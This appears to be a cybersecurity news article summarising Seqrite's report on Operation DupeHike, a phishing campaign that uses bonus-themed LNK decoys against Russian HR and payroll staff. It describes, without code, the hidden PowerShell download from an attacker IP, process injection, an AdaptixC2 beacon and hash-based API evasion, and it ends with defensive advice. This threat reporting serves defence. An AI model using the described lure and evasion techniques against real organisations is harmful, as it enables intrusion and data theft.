Operation DupeHike: Unmasking the Sophisticated Cyber Threat Targeting Russian Corporate Sectors
In the ever-evolving landscape of cyber threats, a new and sophisticated campaign, dubbed Operation DupeHike, has emerged, posing a significant risk to Russian corporate environments. This operation, orchestrated by the threat group identified as UNG0902, specifically targets employees within human resources, payroll, and administrative departments. By leveraging meticulously crafted decoy documents centered around employee bonuses and internal financial policies, the attackers aim to infiltrate systems and deploy a previously unknown malware ecosystem.
The Deceptive Entry Point
The attack initiates through spear-phishing emails that contain ZIP archives masquerading as legitimate corporate documents. These archives bear names like Премия 2025.zip (translating to Bonus 2025.zip) and house malicious shortcut files (.LNK) designed to appear as PDF documents. For instance, filenames such as Document_1_On_the_size_of_the_annual_bonus.pdf.lnk are used to deceive recipients into opening them.
Seqrite security analysts uncovered this campaign on November 21, 2025, after identifying a malicious ZIP archive on VirusTotal. Their investigation revealed that the threat actors possess a deep understanding of Russian corporate HR workflows. The decoy documents are intricately designed, outlining realistic bonus structures tied to performance metrics, key performance indicators (KPIs), and organizational goals. By referencing Russia’s Labor Code and establishing a default bonus rate of fifteen percent of the annual salary, the attackers create convincing social engineering material aimed at employees in financial departments.
Unraveling the Infection Mechanism
The attack chain unfolds in three distinct stages, beginning with the execution of the malicious LNK file. When a victim opens this shortcut file, a PowerShell script runs covertly in the background, utilizing specific flags such as NoNI, nop, and w hidden parameters. This script employs the Invoke-WebRequest command to download a second-stage implant named DUPERUNNER from an attacker-controlled server located at 46.149.71.230.
DUPERUNNER, a C++ compiled implant, is engineered to perform critical reconnaissance and injection operations. Its functionalities are multifaceted, focusing on maintaining persistence within the infected system and evading detection mechanisms. The malware enumerates target processes, including explorer.exe, notepad.exe, and msedge.exe, for injection purposes. Simultaneously, it downloads decoy PDFs to display to users, creating the illusion of legitimate document processing and thereby reducing suspicion.
Following this, the implant executes remote thread injection to load the final payload: an AdaptixC2 beacon. This command-and-control beacon communicates with the attacker’s infrastructure via HTTP POST requests, enabling remote command execution and data exfiltration capabilities. To avoid static detection signatures, the beacon employs dynamic API resolution using djb2-style hashing.
Decoding the Command-and-Control Infrastructure
Seqrite researchers extracted configuration artifacts that revealed beacon identification numbers and command-and-control infrastructure hosted on servers under ASN 48282 and AS 9123, operated by VDSINA-AS and TIMEWEB-AS. Notably, the infrastructure demonstrates port configuration changes from port 80 during implant delivery to port 443 for final beacon operations, indicating ongoing refinement and sophistication in the attack infrastructure.
The Broader Implications
Operation DupeHike exemplifies the evolving threat landscape where advanced social engineering tactics are combined with sophisticated malware capabilities to target corporate environments, particularly in Eastern Europe. The campaign’s focus on human resources and financial departments underscores the attackers’ strategic intent to exploit areas within organizations that handle sensitive employee and financial data.
This operation is not an isolated incident. Similar campaigns have been observed targeting various sectors and regions. For instance, the Payroll Pirates network has been hijacking payroll systems across the United States since mid-2023, using malvertising to trick employees into visiting phishing websites and stealing their login credentials. This operation has targeted over 200 different platforms and compromised more than 500,000 users. ([cybersecuritynews.com](https://cybersecuritynews.com/payroll-pirates-network-of-criminal-groups/?utm_source=openai))
Another notable campaign is Operation CargoTalon, which emerged in late June 2025, targeting Russia’s aerospace and defense sectors through spear-phishing attacks. This operation employs a multi-stage infection chain designed to deploy the EAGLET implant, a custom-built DLL backdoor capable of remote command execution and data exfiltration. ([cybersecuritynews.com](https://cybersecuritynews.com/operation-cargotalon-attacking-russian-aerospace/?utm_source=openai))
These campaigns highlight a trend where threat actors are increasingly focusing on specific departments within organizations, utilizing tailored social engineering tactics and advanced malware to achieve their objectives.
Mitigation Strategies and Recommendations
To defend against such sophisticated attacks, organizations should implement a multi-layered security approach:
1. Employee Training and Awareness: Regularly conduct training sessions to educate employees about the latest phishing tactics and the importance of scrutinizing unexpected emails, especially those containing attachments or links.
2. Email Filtering and Security Measures: Deploy advanced email filtering solutions to detect and block malicious emails before they reach the inbox.
3. Endpoint Detection and Response (EDR): Utilize EDR solutions to monitor and respond to suspicious activities on endpoints in real-time.
4. Regular Software Updates: Ensure that all systems and software are up-to-date with the latest security patches to mitigate vulnerabilities that could be exploited by attackers.
5. Network Segmentation: Implement network segmentation to limit the spread of malware within the organization in case of an infection.
6. Incident Response Planning: Develop and regularly update an incident response plan to ensure a swift and coordinated response to security incidents.
By adopting these strategies, organizations can enhance their resilience against sophisticated cyber threats like Operation DupeHike and safeguard their critical assets and data.
